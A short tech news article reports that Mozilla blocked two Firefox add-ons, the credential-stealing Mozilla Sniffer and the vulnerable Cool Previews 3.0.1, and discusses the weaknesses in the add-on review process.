Mozilla Removes And Blocks 2 Firefox Add-ons

It has not happened often in the past that Mozilla had to pull the plug on add-ons hosted on the official Firefox add-on repository. This can be attributed largely to the review process that every add-on added to the site needs to undergo before it is listed.

The developers of the popular Firefox web browser have some tools at their disposal to deal with add-ons that are either malicious in nature or insecure.

A recent blog post on the Mozilla Add-ons blog revealed that Mozilla had to deal with two add-ons falling in those two groups recently.

The first add-on, Mozilla Sniffer, contained code that intercepted and send login information to a remote server on the Internet.

The issue was discovered on July 12, six days after the addition as an experimental add-on on the Mozilla website. The add-on was disabled immediately after a manual code review and added to the global blocklist.

A total of 1800 installations have been recorded prior to the detection, all users who have installed the add-on receive an automatic uninstallation request, triggered by the adding to the blocklist.

Firefox users who have or had the Mozilla Sniffer add-on installed need to change all their login information on all sites they have visited since installing the add-on to prevent possible account access of third parties.

All add-ons that are uploaded by developers to the Firefox add-on repository are scanned for malicious code. A manual review of the add-on follows at a later time. The virus scan did not detect the "phone home" function, so that the add-on was listed as an experimental add-on on the public website.

It is obvious that this verification process is flawed. It might not happen often that malicious add-ons pass the initial scan but it has happened in the past.

Back in February two add-ons were discovered in the add-on repository that contained malicious code. Mozilla back then increased the number of malware scanners and the frequency of the scans.

A new security model has been proposed which changes the review process so that only code-reviewed add-ons are visible to Firefox users on the add-on's website.

Cool Previews was the second add-on the Mozilla developers had to deal with. A critical security vulnerability was discovered in version 3.0.1 of the add-on, installed by more than 170k users.

The vulnerability can be triggered using a specially crafted hyperlink. If the user hovers the cursor over this link, the preview function executes remote JavaScript code with local chrome privileges, giving the attacking script control over the host computer.

Version 3.0.1 and earlier of Cool Previews have been disabled after the discovery. The developer of Cool Previews managed to update the add-on within a day of notification, the new version is already available on the Mozilla website and as an update.

Add-on updates are displayed automatically to Firefox users. Additional information are provided at the Mozilla blog post.

Advertisement